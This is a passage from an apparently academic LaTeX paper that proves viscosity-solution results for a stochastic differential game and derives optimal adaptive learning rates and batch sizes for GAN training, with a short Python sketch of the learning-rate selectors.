H(t,x,p,A) = \max_{u^1 \in \mathbb{U}^1} \min_{u^2 \in \mathbb{U}^2} H^{(u^1,u^2)}(t,x,p,A), \qquad \forall (t,x,p,A) \in \mathbb{S} \times \mathbb{R}^d \times \mathcal{M}_{\mathbb{R}}(d),
\end{equation*}
with $\mathbb{U}^1$ (resp. $\mathbb{U}^2$) a closed subset of $\mathbb{R}^{k^1}$ (resp. $\mathbb{R}^{k^2}$) and
\begin{equation*}
H^{(u^1,u^2)}(t,x,p,A) = -b^\top p - \cfrac{1}{2} {\text{Tr}}[\tilde{\sigma} \tilde{\sigma}^\top A], \qquad \forall (t,x,p,A) \in \mathbb{S} \times \mathbb{R}^d \times \mathcal{M}_{\mathbb{R}}(d). \end{equation*}
\begin{prop} Assume that $V$ is locally bounded. Then
\begin{itemize}
\item $V_*$ is a viscosity supersolution of
\begin{equation}
-{V_*}_t + H(.,{V_*},{V_*}_x,{V_*}_{xx}) \geq 0, \quad \text{ on } [0,T) \times \mathbb{R}^d,
\label{Eq:prop0_supersol_visco}
\end{equation} with
$$
V_*(t,x) = \underset{(t',x') \rightarrow (t,x)}{\liminf} V(t',x').
$$
\item $V^*$ is a viscosity subsolution of
\begin{equation}
-V^*_t + H(.,V^*,V^*_x,V^*_{xx}) \leq 0, \quad \text{ on } [0,T) \times \mathbb{R}^d,\label{Eq:prop0_subsol_visco}
\end{equation}
with $$ V^*(t,x)= \underset{(t',x') \rightarrow (t,x)}{\limsup} V(t',x').$$
\item $V$ is the unique viscosity solution of
\begin{equation}
-V_t + H(.,V,V_x,V_{xx}) = 0, \quad \text{ on } [0,T) \times \mathbb{R}^d.\label{Eq:prop0_sol_visco_0}
\end{equation}
\end{itemize}
\label{prop0:Visco_sol}
\end{prop}
\begin{proof}
{(For Proposition \ref{prop0:Visco_sol}).} Let us first prove the supersolution property \eqref{Eq:prop0_supersol_visco}.
\begin{enumerate}
\item For this, assume to the contrary that there is $(t_0,x_0)\in \mathbb{S}=[0,T] \times \mathbb{R}^d$ together with a smooth function $\phi:\mathbb{S} \rightarrow \mathbb{R}$ satisfying
\begin{equation*}
0 = (V_*-\phi)(t_0,x_0) < (V_*-\phi)(t,x), \quad \forall (t,x) \in [0,T] \times \mathbb{R}^d,\quad (t,x) \ne (t_0,x_0),
\end{equation*}
such that
\begin{equation*}
\big(- \partial_t \phi + H(.,\phi,\phi_x,\phi_{xx} ) \big) (t_0,x_0) < 0.
\end{equation*}
For $\tilde{\epsilon}>0$, define $\psi$ by
\begin{equation*}
\psi(t,x) = \phi(t,x) - \tilde{\epsilon} \big( |t-t_0|^2 + \|x - x_0\|^4 \big),
\end{equation*}
and note that $\psi$ converges uniformly on compact sets to $\phi$ as $\tilde{\epsilon} \rightarrow 0$. Since $H$ is upper-semicontinuous and $(\psi,\psi_t,\psi_x,\psi_{xx})(t_0,x_0) = (\phi,\phi_t,\phi_x,\phi_{xx})(t_0,x_0)$, we can choose $\tilde{\epsilon} > 0$ small enough so that there exists $r > 0$, with $t_0 + r < T$, such that for any $u^{1} \in \mathbb{U}^1$ one can find some $\bar{u}^2 \in \mathbb{U}^2$ satisfying
\begin{equation}
\big(- \partial_t \psi + H^{(u^1,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) \big) (t,x) < 0, \qquad \forall (t,x) \in B_r(t_0,x_0),
\label{Eq:prop0_eq1}
\end{equation}
with $B_r(t_0,x_0) $ the open ball of radius $r$ and center $(t_0,x_0)$. Let $(t_n,x_n)_{n\geq 1}$ be a sequence in $B_r(t_0,x_0)$ such that $\big(t_n, x_n,V(t_n,x_n)\big) \rightarrow \big(t_0, x_0,V_*(t_0,x_0)\big) $, let $\nu^1 \in \mathcal{U}^1_{t_n}$ be arbitrary, let $\nu^2$ be the constant control $\nu^2 = \bar{u}^{2}$, and set $\nu = (\nu^1, \nu^2)$. Now write $X^n_. = X^{\nu}_{t_n,x_n}(.) $ for the solution of \eqref{Eq:dynamics_x_u} with control $\nu$ and initial condition $X^n_{t_n} = x_n$, and consider the stopping time
\begin{equation*}
\theta_n = \inf\{ s>t_n;\, (s,X^n_s) \not\in B_r(t_0,x_0) \}.
\end{equation*}
Note that $\theta_n < T$ since $t_0 + r < T$. Using \eqref{Eq:prop0_eq1} gives
\begin{equation*}
\mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t \psi + H^{(\nu^1_s,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] < 0.
\end{equation*}
By the arbitrariness of $\nu^1$, we get
\begin{equation}
\inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t\psi + H^{(\nu^1_s,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] < 0.
\label{Eq:prop0_eq1_1}
\end{equation}
Applying It\^{o}'s formula to $\psi$ and using \eqref{Eq:prop0_eq1_1}, we deduce that
\begin{align*}
\psi(t_n,x_n) < \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \psi(\theta_n,X^{n}_{\theta_n})].
\end{align*}
Now observe that $\phi > \psi + \eta$ on $\big([0,T]\times \mathbb{R}^d\big) \setminus B_r(t_0, x_0)$ for some $\eta >0$. Hence, the above inequality implies that $\psi(t_n,x_n) < \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] - \eta$. Since $(\psi -V)(t_n, x_n) \rightarrow 0$, we can then find $n$ large enough so that
\begin{equation*}
V(t_n,x_n) < \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}}\mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] - \eta/2.
\end{equation*}
Meanwhile, Theorem \ref{Theo:DPP1} ensures that
\begin{equation*}
V(t_n,x_n) \geq \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \phi(\theta_n,X^{\nu}_{t_n,x_n}(\theta_n))],
\end{equation*}
which gives the required contradiction.
\item We now move to the proof of \eqref{Eq:prop0_subsol_visco}, which is similar to that of \eqref{Eq:prop0_supersol_visco}. We assume to the contrary that there is $(t_0,x_0)\in \mathbb{S}$ together with a smooth function $\phi:\mathbb{S} \rightarrow \mathbb{R}$ satisfying
\begin{equation*}
0 = (V^*-\phi)(t_0,x_0) > (V^*-\phi)(t,x), \quad \forall (t,x) \in [0,T] \times \mathbb{R}^d,\quad (t,x) \ne (t_0,x_0),
\end{equation*}
such that
\begin{equation*}
\big(- \partial_t \phi + H(.,\phi,\phi_x,\phi_{xx} ) \big) (t_0,x_0) > 0.
\end{equation*}
For $\tilde{\epsilon}>0$, define $\psi$ by
\begin{equation*}
\psi(t,x) = \phi(t,x) + \tilde{\epsilon} \big( |t-t_0|^2 + \|x - x_0\|^4 \big),
\end{equation*}
and note that $\psi$ converges uniformly on compact sets to $\phi$ as $\tilde{\epsilon} \rightarrow 0$. Since $H$ is lower-semicontinuous and $(\psi,\psi_t,\psi_x,\psi_{xx})(t_0,x_0) = (\phi,\phi_t,\phi_x,\phi_{xx})(t_0,x_0)$, we can choose $\tilde{\epsilon} > 0$ small enough so that there exists $r > 0$, with $t_0 + r < T$, such that for any $u^{1} \in \mathbb{U}^1$ one can find some $\bar{u}^2 \in \mathbb{U}^2$ satisfying
\begin{equation}
\big(- \partial_t \psi + H^{(u^1,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) \big) (t,x) > 0, \qquad \forall (t,x) \in B_r(t_0,x_0),
\label{Eq:prop0_eq1_11}
\end{equation}
with $B_r(t_0,x_0) $ the open ball of radius $r$ and center $(t_0,x_0)$. Let $(t_n,x_n)_{n\geq 1}$ be a sequence in $B_r(t_0,x_0)$ such that $\big(t_n, x_n,V(t_n,x_n)\big) \rightarrow \big(t_0, x_0,V^*(t_0,x_0)\big) $, let $\nu^1 \in \mathcal{U}^1_{t_n}$ be arbitrary, let $\nu^2$ be the constant control $\nu^2 = \bar{u}^{2}$, and set $\nu = (\nu^1, \nu^2)$. Now write $X^n_. = X^{\nu}_{t_n,x_n}(.) $ for the solution of \eqref{Eq:dynamics_x_u} with control $\nu$ and initial condition $X^n_{t_n} = x_n$, and consider the stopping time
\begin{equation*}
\theta_n = \inf\{ s>t_n;\, (s,X^n_s) \not\in B_r(t_0,x_0) \}.
\end{equation*}
Note that $\theta_n < T$ since $t_0 + r < T$. Using \eqref{Eq:prop0_eq1_11} gives
\begin{equation*}
\mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t \psi + H^{(\nu^1_s,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] > 0.
\end{equation*}
By the arbitrariness of $\nu^1$, we get
\begin{equation}
\inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[\int_{t_n}^{\theta_n}[- \partial_t\psi + H^{(\nu^1_s,\bar{u}^2)}(.,\psi,\psi_x,\psi_{xx} ) ](s,X^{n}_{s})\, ds] > 0.
\label{Eq:prop0_eq1_12}
\end{equation}
Applying It\^{o}'s formula to $\psi$ and using \eqref{Eq:prop0_eq1_12}, we deduce that
\begin{align*}
\psi(t_n,x_n) > \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \psi(\theta_n,X^{n}_{\theta_n})].
\end{align*}
Now observe that $\psi > \phi + \eta$ on $\big([0,T]\times \mathbb{R}^d\big) \setminus B_r(t_0, x_0)$ for some $\eta >0$. Hence, the above inequality implies that $\psi(t_n,x_n) > \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] + \eta$. Since $(\psi -V)(t_n, x_n) \rightarrow 0$, we can then find $n$ large enough so that
\begin{equation*}
V(t_n,x_n) > \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}}\mathbb{E}[ \phi(\theta_n,X^{n}_{\theta_n})] + \eta/2.
\end{equation*}
Meanwhile, Theorem \ref{Theo:DPP1} ensures that
\begin{equation*}
V(t_n,x_n) \leq \inf_{\nu^{2} \in \mathcal{U}^2_{t_n} } \sup_{\nu^1 \in \mathcal{U}^1_{t_n}} \, \mathbb{E}[ \phi(\theta_n,X^{\nu}_{t_n,x_n}(\theta_n))],
\end{equation*}
which gives the required contradiction.
\item Since $V_* \leq V \leq V^*$, the comparison principle in Lemma \ref{lem:comparison_principle_recall} below (see \citep{pham2009continuous}) shows that $V$ is the unique viscosity solution of \eqref{Eq:prop0_sol_visco_0} which completes the proof.
\end{enumerate}
\end{proof}
\begin{lem}[Comparison principle]
Assume the same conditions as in Proposition \ref{prop0:Visco_sol}. Let $u$ and $v$ be respectively an upper-semicontinuous viscosity subsolution and a lower-semicontinuous viscosity supersolution of \eqref{Eq:prop0_sol_visco_0} such that $u(T,.) \leq v(T,.)$ on $\mathbb{R}^d$. Then, $u \leq v$ on $[0,T) \times \mathbb{R}^d$.
\label{lem:comparison_principle_recall}
\end{lem}
\section{Analysis of Optimal Adaptive Learning Rate and Batch Size}
This section is devoted to the analysis of the optimal learning rate and batch size, and to a discussion of their implications for GANs training.
\subsection{Optimal Learning Rate}
\manuallabel{sec:OptLearningRate}{5.1}
Note that problem \eqref{Eq:ValFunctDef} is a special case of the more general framework in Section \ref{subsec:mkv_diff_ctrl_pbm}, since the process $q$ in \eqref{Eq:sde} is a diffusion of the same form as Equation \eqref{Eq:dynamics_x_u}. Indeed, one can simply take the variables $X_t^\nu$, $\nu$, $b$, and $\tilde{\sigma}$ in \eqref{Eq:dynamics_x_u} as
$$
\left\{
\begin{array}{ccl}
X_t^\nu = q(t), & & b(t,x,v) = \left(
\begin{array}{c}
v^w g_w(x) \\
-v^\theta g_\theta(x)
\end{array}
\right), \\
& & \\
\nu = u, & & \tilde{\sigma}(t,x,v) = \left(
\begin{array}{cc}
v^w \sqrt{\bar{\eta}^{w}} \sigma_w(x) & 0 \\
0 & v^\theta \sqrt{\bar{\eta}^{\theta}} \sigma_\theta(x)
\end{array}
\right),
\end{array}
\right.
$$
for any $x$ and $v = (v^w,v^\theta)$, and apply the general results of Section \ref{subsec:mkv_diff_ctrl_pbm} to analyze the optimal adaptive learning rate, assuming
\begin{Assumption}
\begin{enumerate}[label = D.\arabic*]
\item There exists a constant $L^1$ such that for $\phi = g_w,\,g_\theta,\sigma_w,\,\sigma_\theta$, we have
\begin{equation*}
\begin{array}{ll}
\|\phi(w,\theta) - \phi(w',\theta')\| \leq L^1 \big(\|w - w'\| + \|\theta - \theta'\|\big),&\\
\|\phi(w,\theta)\|\leq L^1 \big(1 + \|w\| + \|\theta\|\big),&
\end{array}
\end{equation*}
for any $(w,w',\theta,\theta')\in \big(\mathbb{R}^{M}\big)^2 \times \big(\mathbb{R}^{N}\big)^2$.
\item There exists a constant $K^1$ such that
\begin{equation*}
|g(w,\theta)| \leq K^1 \big(1 + \|w\|^2 + \|\theta\|^2 \big), \, \forall (w,\theta)\in \mathbb{R}^{M}\times \mathbb{R}^{N}.
\end{equation*}
\end{enumerate}
\label{Assump:D}
\end{Assumption}
In particular, the value function $v$ is a solution to the following Isaacs-Bellman equation
\begin{equation}
\left\{
\begin{array}{ll}
v_t + \max_{u^w \in [u^{\min},u^{\max}]}\,\min_{u^\theta \in [u^{\min},u^{\max}]} & \big\{\big(u^w g_{w}^\top v_w - u^{\theta} g_{\theta}^\top v_\theta \big)\vspace{0.2cm}\\
& \hspace{-4cm}+ \frac{1}{2} \big[ (u^w)^2 (\bar{\Sigma}^w:v_{ww}) + (u^\theta)^2 (\bar{\Sigma}^\theta:v_{\theta \theta})\big]\big\} = 0, \vspace{0.2cm}\\
v(T,\cdot) = g(\cdot),&
\end{array}
\right.
\label{Eq:valfct_diffeq01}
\end{equation}
with $A:B = {\text{Tr}}[A^\top B]$ for any real matrices $A$ and $B$. More precisely, we have
\begin{prop}
Assume Assumption \ref{Assump:D}. Then
\begin{itemize}
\item The value function $v$ defined in \eqref{Eq:ValFunctDef} is the unique viscosity solution of \eqref{Eq:valfct_diffeq01}.
\item When $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, the optimal learning rate $\bar{u}^w$ and $\bar{u}^\theta$ are given by
\begin{align*}
\hspace{0.5cm}
\bar{u}^w(t) = \left\{
\begin{array}{lll}
u^{\min} \vee \left( u^{w*}(t)\wedge u^{\max}\right), & \hspace{0.2cm} & \text{if } \, \left(\bar{\Sigma}^w:v_{ww}\right)\big(t,q(t)\big) < 0,\\
\\
u^{\max}, & \hspace{0.2cm} & \text{if } \, |u^{\max}-u^{w*}(t)| \geq |u^{\min}-u^{w*}(t)|,\\
\\
u^{\min}, & \hspace{0.2cm} & \text{otherwise,}
\end{array}
\right.
\end{align*}
and
\begin{align*}
\bar{u}^\theta(t) = \left\{
\begin{array}{lll}
u^{\min} \vee \left( u^{\theta*}(t) \wedge u^{\max} \right), & \hspace{0.2cm} & \text{if }\, \left(\bar{\Sigma}^\theta:v_{\theta \theta}\right) \big(t,q(t)\big) > 0,\\
\\
u^{\max}, & \hspace{0.2cm} & \text{if } \, |u^{\max}-u^{\theta*}(t)| \geq |u^{\min}-u^{\theta*}(t)|,\\
\\
u^{\min}, & \hspace{0.2cm} & \text{otherwise,}
\end{array}
\right.
\end{align*}
with $u^{w*}(t) = \left(\cfrac{-g_{w}^\top v_w}{\bar{\Sigma}^w:v_{ww}}\right)\big(t,q(t)\big)$, $ u^{\theta*}(t) = \left(\cfrac{g_{\theta}^\top v_\theta}{\bar{\Sigma}^\theta:v_{\theta \theta}} \right)\big(t,q(t)\big)$, and $\bar{\Sigma}^w$ and $\bar{\Sigma}^\theta$ as
\begin{equation*}
\left\{
\begin{array}{lll}
\bar{\Sigma}^w (t,q) = \{\bar{\sigma}^w_t (\bar{\sigma}^{w}_t)^{\top}\}(q), & \bar{\Sigma}^\theta(t,q) = \{\bar{\sigma}^\theta_t (\bar{\sigma}^{\theta})^{\top}_t\}(q),&\\
\\
\bar{\sigma}^w_t (q) = \sqrt{\bar{\eta}^w(t)} \sigma^w (q), & \bar{\sigma}^\theta_t (q) = \sqrt{\bar{\eta}^\theta(t)} \sigma^\theta(q),&
\end{array}
\right.
\end{equation*}
for any $t \in \mathbb{R}_+$, and $q = (w,\theta)\in \mathbb{R}^{M}\times \mathbb{R}^{N}$.
\end{itemize}
\label{Prop:OptiLR}
\end{prop}
\begin{proof}{(For Proposition \ref{Prop:OptiLR}).}
Since Assumption \ref{Assump:D} holds, one can simply use Proposition \ref{prop0:Visco_sol} to show that $v$ is the unique viscosity solution of \eqref{Eq:valfct_diffeq01}. Moreover, the control $\bar{u}^w(t)$ maximizes the quadratic function $u \mapsto u \big( g_{w}^\top v_w \big) ( t,q(t) ) + \frac{1}{2} u^2 \big( \bar{\Sigma}^w:v_{ww}\big) ( t,q(t) )$, and similarly the control $\bar{u}^\theta(t) $ minimizes $u \mapsto -u \big( g_{\theta}^\top v_\theta \big) ( t,q(t) ) + \frac{1}{2} u^2 \big(\bar{\Sigma}^\theta:v_{\theta \theta}\big) ( t,q(t) )$. A direct computation completes the proof.
\end{proof}
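In pseudocode, the case analysis of Proposition \ref{Prop:OptiLR} reduces to a small selector for each player. The sketch below is ours: the scalar inputs (the gradient and curvature terms evaluated at $(t,q(t))$) are assumed to be supplied externally, and the curvature terms are assumed nonzero.

```python
def clip(u, u_min, u_max):
    return max(u_min, min(u, u_max))

def lr_discriminator(grad_term, curv_term, u_min, u_max):
    """ū^w: grad_term = g_w^T v_w, curv_term = Σ^w : v_ww, both at (t, q(t))."""
    u_star = -grad_term / curv_term           # interior candidate u^{w*}
    if curv_term < 0:                         # concavity in w holds
        return clip(u_star, u_min, u_max)
    # concavity violated: jump to the admissible bound farthest from u*
    return u_max if abs(u_max - u_star) >= abs(u_min - u_star) else u_min

def lr_generator(grad_term, curv_term, u_min, u_max):
    """ū^θ: grad_term = g_θ^T v_θ, curv_term = Σ^θ : v_θθ, both at (t, q(t))."""
    u_star = grad_term / curv_term            # interior candidate u^{θ*}
    if curv_term > 0:                         # convexity in θ holds
        return clip(u_star, u_min, u_max)
    return u_max if abs(u_max - u_star) >= abs(u_min - u_star) else u_min
```

For instance, with $g_{w}^\top v_w = 1$, $\bar{\Sigma}^w:v_{ww} = -2$, and bounds $[0,1]$, the discriminator selector returns the interior rate $0.5$.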
\paragraph{Learning rate and GANs training.}
\manuallabel{sec:LRAndDivergence}{3.2}
We can now see the explicit dependence of the optimal learning rate on the convexity of the objective function, and its relation to Newton's algorithm. Specifically, \begin{itemize}
\item Proposition \ref{Prop:OptiLR} provides a two-step scheme for the selection of the optimal learning rate:
\begin{enumerate}[label = Step \arabic*., leftmargin = 1.5cm]
\item Solve the Isaacs-Bellman equation to get $\bar{u} = (\bar{u}^w,\bar{u}^\theta)$.
\item Given $\bar{u}$, apply the gradient algorithm with the optimal learning rate $\bar{u} \bullet \bar{\eta}$.
\end{enumerate}
\item To get the expression of the optimal adaptive learning rate in Proposition \ref{Prop:OptiLR}, we need some regularity of the value function $v$, namely $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$. Conditions ensuring such regularity can be found in
\citep{pimentel2019regularity}.
\item When the value function $v$ does not satisfy the regularity requirement $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, it is standard to use discrete-time approximations \citep{barles1991convergence,kushner2001numerical,wang2008maximal}, which are known to converge to the value function.
\item The introduction of the clipping parameter $u^{\max}$ is closely related to the convexity issue discussed for GANs in Section \ref{sec:GANsTrainConv}. When the convexity condition $\bar{\Sigma}^w:v_{ww} < 0$ is violated, the learning rate takes the maximum value $u^{\max}$ or minimum value $u^{\min}$ to escape as quickly as possible from this non-concave region. The clipping parameter $u^{\max}$ is also used to prevent explosion in GANs training. Conditions under which explosion occurs are detailed in Proposition \ref{Prop:LRDivergence}.
\item The control $(\bar{u}^w,\bar{u}^\theta)$ of Proposition \ref{Prop:OptiLR} is closely related to the standard Newton algorithm. To see this, take $\bar{\eta} = (1,1)$, $M = N = 1$, $\sigma^w = g_w$, $ \sigma^\theta = g_\theta$, and replace the value function $v$ by the suboptimal choice $g$. For such a configuration of the parameters and with the convexity conditions
$$
\hspace{-0.6cm}\big(\bar{\Sigma}^w:g_{ww}\big) = |g_w|^2 g_{ww} < 0, \quad \big(\bar{\Sigma}^\theta:g_{\theta \theta}\big) = |g_\theta|^2 g_{\theta \theta}> 0,
$$
the controls $\bar{u}^w$ and $\bar{u}^\theta$ become
\begin{equation}
\hspace{-0.6cm}\bar{u}^w(t) = u^{\min} \vee \cfrac{-1}{ \bar{\eta}^w(t) g_{ww}(q(t))} \wedge u^{\max}, \quad \bar{u}^\theta (t) = u^{\min} \vee \cfrac{1}{ \bar{\eta}^\theta(t) g_{\theta \theta}(q(t))} \wedge u^{\max}.
\label{Eq:ConnecNewtAlgo}
\end{equation}
In the absence of the clipping parameters $u^{\max}$ and $u^{\min}$, the rates $\bar{u}^w$ and $\bar{u}^\theta$ are exactly the ones used in Newton's algorithm.
\end{itemize}
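To make the Newton connection concrete, consider the hypothetical saddle objective $g(w,\theta) = -w^2 + \theta^2$ (concave in $w$, convex in $\theta$). With $\bar{\eta} = (1,1)$, the clipped rates of Equation \eqref{Eq:ConnecNewtAlgo} turn one coupled gradient step into a full Newton step; the sketch below, including all helper names, is ours:

```python
def clipped_newton_rates(g_ww, g_thth, eta_w, eta_th, u_min, u_max):
    """Eq. (ConnecNewtAlgo): ū^w = clip(-1/(η^w g_ww)), ū^θ = clip(1/(η^θ g_θθ))."""
    clip = lambda u: max(u_min, min(u, u_max))
    return clip(-1.0 / (eta_w * g_ww)), clip(1.0 / (eta_th * g_thth))

def gan_step(w, theta, g_w, g_th, g_ww, g_thth,
             eta_w=1.0, eta_th=1.0, u_min=0.0, u_max=1.0):
    """One coupled update: gradient ascent in w (maximizer), descent in θ (minimizer)."""
    u_w, u_th = clipped_newton_rates(g_ww(w, theta), g_thth(w, theta),
                                     eta_w, eta_th, u_min, u_max)
    return (w + u_w * eta_w * g_w(w, theta),
            theta - u_th * eta_th * g_th(w, theta))

# Toy saddle g(w, θ) = -w² + θ²: the clipped Newton rates send (1, 1) to the
# saddle point (0, 0) in a single step, exactly as Newton's method would.
w1, th1 = gan_step(1.0, 1.0,
                   g_w=lambda w, t: -2.0 * w, g_th=lambda w, t: 2.0 * t,
                   g_ww=lambda w, t: -2.0,    g_thth=lambda w, t: 2.0)
```

Here the rates $\bar{u}^w = \bar{u}^\theta = 0.5$ fall inside the clipping interval, so no bound is active and the update is the pure Newton step.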
\paragraph{Learning rate and GANs convergence revisited.}
We can now further analyze the impact of the learning rate on the convergence of GANs, generalizing the example of Section \ref{sec:GANTrainParamTun} in which poor choices of the learning rate destroy the convergence.\\
Let $\epsilon > 0$, and $\tilde{u} = (\tilde{u}^w,\tilde{u}^\theta)$ be
$$
\tilde{u}(t) = \left(\cfrac{-2 |g_{w}|^2 }{\bar{\Sigma}^w:g_{ww}},\, \cfrac{2|g_{\theta}|^2}{\bar{\Sigma}^\theta:g_{\theta \theta}}\right) \big(t,q(t)\big), \qquad \forall t \geq 0.
$$
We assume the existence of $\gamma>0$ such that
$$
\gamma \leq -\left(\bar{\Sigma}^w:g_{ww}\right)(t,q), \qquad \gamma \leq \left(\bar{\Sigma}^\theta:g_{\theta \theta}\right)(t,q),
$$
for every $t\geq 0$, and $q = (w,\theta) \in \mathbb{R}^{M} \times \mathbb{R}^{N}$. Then,
\begin{prop}
For any control process $u = (u^{w},u^{\theta}) \in \mathcal{U}^w \times \mathcal{U}^\theta$ such that
\begin{itemize}
\item $u^{w} \geq (\tilde{u}^w \vee 1) + \epsilon$, there exists $\tilde{\epsilon} > 0$ satisfying
\begin{align*}
J(T,0,q_0;u) &\leq -\tilde{\epsilon} \times T + \mathbb{E}\left[ \int_{0}^T \big\{ - u^{\theta} |g_{\theta}|^2 + \frac{1}{2} (u^\theta)^2 (\bar{\Sigma}^\theta:g_{\theta \theta})\big\}\big(s,q(s)\big)\,ds|q_0\right]\\
& = -\tilde{\epsilon} \times T + L^1(T,q_0;u),
\numberthis\label{Eq:expl1}
\end{align*}
for any $(T,q_0) \in \mathbb{R}_+\times \mathbb{R}^{M+N}$.
\item $u^{\theta} \geq (\tilde{u}^\theta \vee 1) + \epsilon$, there exists $\tilde{\epsilon} > 0$ such that
\begin{align*}
J(T,0,q_0;u) &\geq \tilde{\epsilon} \times T + \mathbb{E}\left[ \int_{0}^T \big\{ u^{w} |g_{w}|^2 + \frac{1}{2} (u^w)^2 (\bar{\Sigma}^w:g_{ww})\big\}\big(s,q(s)\big)\,ds|q_0\right]\\
& = \tilde{\epsilon} \times T + L^2(T,q_0;u),
\numberthis \label{Eq:expl2}
\end{align*}
for any $(T,q_0) \in \mathbb{R}_+\times \mathbb{R}^{M+N}$.
\end{itemize}
\label{Prop:LRDivergence}
\end{prop}
Note that inequality \eqref{Eq:expl1} shows that \begin{equation}
J(T,0,q_0;u) \underset{T \rightarrow \infty}{\rightarrow} - \infty,
\label{Eq:Expl_explicit1}
\end{equation}
for any $q_0 \in \mathbb{R}^{M+N}$ satisfying $\limsup_{T \rightarrow \infty} L^1(T,q_0;u) < +\infty$. Similarly, inequality \eqref{Eq:expl2} gives
\begin{equation}
J(T,0,q_0;u) \underset{T \rightarrow \infty}{\rightarrow} + \infty,
\label{Eq:Expl_explicit2}
\end{equation}
for every $q_0 \in \mathbb{R}^{M+N}$ such that $\liminf_{T \rightarrow \infty} L^2(T,q_0;u) > -\infty$. Thus, Equations \eqref{Eq:Expl_explicit1} and \eqref{Eq:Expl_explicit2} guarantee the explosion of the reward function without proper choices of the learning rate.
\begin{proof}{(For Proposition \ref{Prop:LRDivergence}).}
Since the proofs of inequalities \eqref{Eq:expl1} and \eqref{Eq:expl2} are similar, we will only prove \eqref{Eq:expl1}. Let $(T,q_0) \in \mathbb{R}_+ \times \mathbb{R}^{M+N}$. By It\^{o}'s formula and the SDE \eqref{Eq:sde2} for the process $(q(t))_{t \geq 0}$, we get
\begin{align*}
\partial_T J(T,0,q_0;u) & = \mathbb{E}\big[\big\{\big( u^w |g_{w}|^2 - u^{\theta} |g_{\theta}|^2 \big) \\
& \hspace{-2.2cm} + \frac{1}{2} \big[ (u^w)^2 (\bar{\Sigma}^w:g_{ww}) + (u^\theta)^2 (\bar{\Sigma}^\theta:g_{\theta \theta})\big]\,\big\} \big(T,q(T)\big)|q_0\big] \\
&\hspace{-2.25cm} = \mathbb{E} \big[h^1\big(T,q(T);u^w(T)\big) \big] + \mathbb{E} \big[h^2 \big(T,q(T);u^\theta(T)\big) \big],
\end{align*}
with
$$
h^1(t,q;u) = u |g_{w}|^2(q) + \frac{1}{2} (u)^2 (\bar{\Sigma}^w:g_{ww})(t,q),
$$
and
$$
h^2(t,q;u) = -u |g_{\theta}|^2(q) + \frac{1}{2} (u)^2 (\bar{\Sigma}^\theta:g_{\theta \theta})(t,q),
$$
for any $(t,q,u) \in \mathbb{R}_+ \times \mathbb{R}^{M+N} \times [0,u^{\max}]$. Using
$$
\gamma \leq -(\bar{\Sigma}^w:g_{ww})(t,q),
$$
for every $(t,q) \in \mathbb{R}_+ \times \mathbb{R}^{M+N}$, and $u^{w} \geq (\tilde{u}^w \vee 1) + \epsilon$ almost surely, we obtain\footnote{Note that the convexity condition $(\bar{\Sigma}^w:g_{ww}) \leq 0$ is in force.}
\begin{align*}
\mathbb{E}\big[h^1\big(T,q(T);u^{w}(T)\big)\big] & = \mathbb{E}\big[ \big(a\, u^{w} ( u^{w} - \tilde{u}^w ) \big) (T) \big] \\
& \hspace{-1.7cm}\leq -(\gamma/2) \mathbb{E}[u^{w} (T)] \epsilon \leq - (\gamma/2) (1 + \epsilon) \epsilon = -\tilde{\epsilon},
\end{align*}
with $a(T) = \cfrac{(\bar{\Sigma}^w:g_{ww})(T,q(T))}{2}$.
Thus,
\begin{align*}
\partial_T J(T,0,q_0;u)\leq -\tilde{\epsilon} + \mathbb{E}\big[ h^2\big( T, q(T);u^\theta(T) \big) \big],
\end{align*}
which ensures that
\begin{align*}
J (T, 0, q_0;u) \leq -\tilde{\epsilon}\, T + L^1(T,q_0;u),
\end{align*}
for all $T \geq 0$.
\end{proof}
\subsection{Optimal Batch Size}
\manuallabel{sec:batch_size}{5.2}
The optimal batch size problem can be formulated and analyzed by following the same approach as in Section \ref{sec:OptLearningRate}.
\begin{prop}
Under Assumption \ref{Assump:D},
\begin{itemize}
\item The value function $v$ solving the batch size problem \eqref{Eq:ValFunctDef23} is the unique viscosity solution of the following equation:
\begin{equation}
\left\{
\begin{array}{ll}
v_t + \min_{m^\theta \in [1,m^{\max}]} \left\{\cfrac{\big( g_{w}^\top v_w - g_{\theta}^\top v_\theta \big)}{ m^\theta} + \cfrac{\left[ (\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta})\right] }{2 (m^\theta)^2} \right\} = 0, \\
v(T,\cdot) = g(\cdot),&
\end{array}
\right.
\label{Eq:HJB_BS_prop}
\end{equation}
